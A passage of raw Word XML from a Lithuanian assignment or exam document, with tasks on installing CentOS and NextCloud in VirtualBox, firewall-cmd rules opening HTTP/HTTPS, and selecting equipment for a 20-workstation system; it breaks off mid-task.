              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75236FC6" w14:textId="74805682" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3 pav. Prisijungimas su SSH protokol</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> per Putty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47483A5B" w14:textId="2995AF7F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="66314E74" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga prie </w:t>
      </w:r>
      <w:hyperlink r:id="rId206">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://linuxconfig.org/how-to-install-putty-in-redhat-linux-8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="633747AA" w14:textId="1DFB8882" w:rsidR="00854A82" w:rsidRPr="005A5C28" w:rsidRDefault="00854A82" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7B8A8E" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6"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2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮDIEGTI IR KONFIGŪRUOTI SERVERIO-KLIENTO PROGRAMŲ RINKINĮ, SKIRTĄ DEBESŲ SAUGYKLAI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A93BC" w14:textId="4E583DE2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pateikti įdiegtos</w:t>
      </w:r>
      <w:r w:rsidR="003262DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="003262DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidR="003262DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS operacinės sistemos ir debesų programin</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> rinkin</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NextCloud</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į virtualios mašinos (VirtualBox arba analogo)</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ekrano</w:t>
      </w:r>
      <w:r w:rsidR="00426412" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vaizdus</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Pateikti konfigūravimo ekrano vaizdus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E556980" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F2068B" w14:textId="1C1F9B41" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="07756629" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE3DFD5" wp14:editId="47518D29">
            <wp:extent cx="3514725" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1710668351" name="Picture 1710668351"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668351"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId207">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3514725" cy="2943225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAD8137" w14:textId="7C1D34BB" w:rsidR="003D0414" w:rsidRPr="005A5C28" w:rsidRDefault="44CC791B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4 pav. </w:t>
      </w:r>
      <w:r w:rsidR="630B03F9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įdiegta CENTOS į VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274C594" w14:textId="6901756C" w:rsidR="6A3353D6" w:rsidRPr="005A5C28" w:rsidRDefault="657B6ACA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="0DC57393" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId208">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17D2F3BB" w14:textId="6901756C" w:rsidR="00C04A75" w:rsidRPr="005A5C28" w:rsidRDefault="00C04A75" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B38A3E" w14:textId="6AD1886F" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F588CEA" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sukurti taisyklę </w:t>
      </w:r>
      <w:r w:rsidR="003262DD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ugniasienėje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFCF756" w14:textId="6901756C" w:rsidR="7A94D835" w:rsidRPr="005A5C28" w:rsidRDefault="4537F1AD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudo firewall-cmd --zone=public --add-servi</w:t>
      </w:r>
      <w:r w:rsidR="31AD2719" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ce</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo firewall-cmd --zone=public --add-service=http </w:t>
      </w:r>
      <w:r w:rsidR="0E12E2C4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AFDB6B" w14:textId="6901756C" w:rsidR="7A94D835" w:rsidRPr="005A5C28" w:rsidRDefault="4537F1AD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo firewall-cmd --zone=public --add-service=https </w:t>
      </w:r>
      <w:r w:rsidR="7353D893" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–-</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>permanent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765AA6B5" w14:textId="364D6559" w:rsidR="00733B2B" w:rsidRPr="005A5C28" w:rsidRDefault="2834DDC2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo firewall-cmd </w:t>
      </w:r>
      <w:r w:rsidR="714217FA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4E3C0" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE76AD1" w14:textId="7478AEC0" w:rsidR="7A94D835" w:rsidRPr="005A5C28" w:rsidRDefault="3F9DC890" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72495E8B" wp14:editId="2D9F7350">
            <wp:extent cx="3876675" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="351473270" name="Picture 35147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73270"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3876675" cy="2428875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="568DC32C" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="44CC791B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 p</w:t>
      </w:r>
      <w:r w:rsidR="17D3C94E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">av. </w:t>
      </w:r>
      <w:r w:rsidR="4EAC4224" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ugnia</w:t>
      </w:r>
      <w:r w:rsidR="23D3F87E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sienės langas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45E8C4" w14:textId="074754D2" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="27861B90" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Šaltinis: </w:t>
      </w:r>
      <w:r w:rsidR="5897C67B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">How to install Nextcloud on CentOS 8. (2020, lapkričio </w:t>
      </w:r>
      <w:r w:rsidR="4830DE0A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6). </w:t>
      </w:r>
      <w:r w:rsidR="3E38DDE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UpCloud. </w:t>
      </w:r>
      <w:r w:rsidR="4830DE0A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:r w:rsidR="2834DDC2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://upcloud.com/community/tutorials/install-nextcloud-centos/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405498B" w14:textId="06321B17" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="007D6C3C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F33AA8" w14:textId="77777777" w:rsidR="00D040C6" w:rsidRPr="005A5C28" w:rsidRDefault="00D040C6"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3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">PAGAL POREIKĮ PARINKTI IFORMACINĖS SISTEMOS ĮRANGĄ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F557C5" w14:textId="0535AD19" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTAT</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: m</w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti tinklinę, kompiuterinę, programinę įrangą su specifikacijomis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>bei kainomis</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-čiai </w:t>
      </w:r>
      <w:r w:rsidR="6F163ACE" w:rsidRPr="005A5C28">
        <w:rPr>
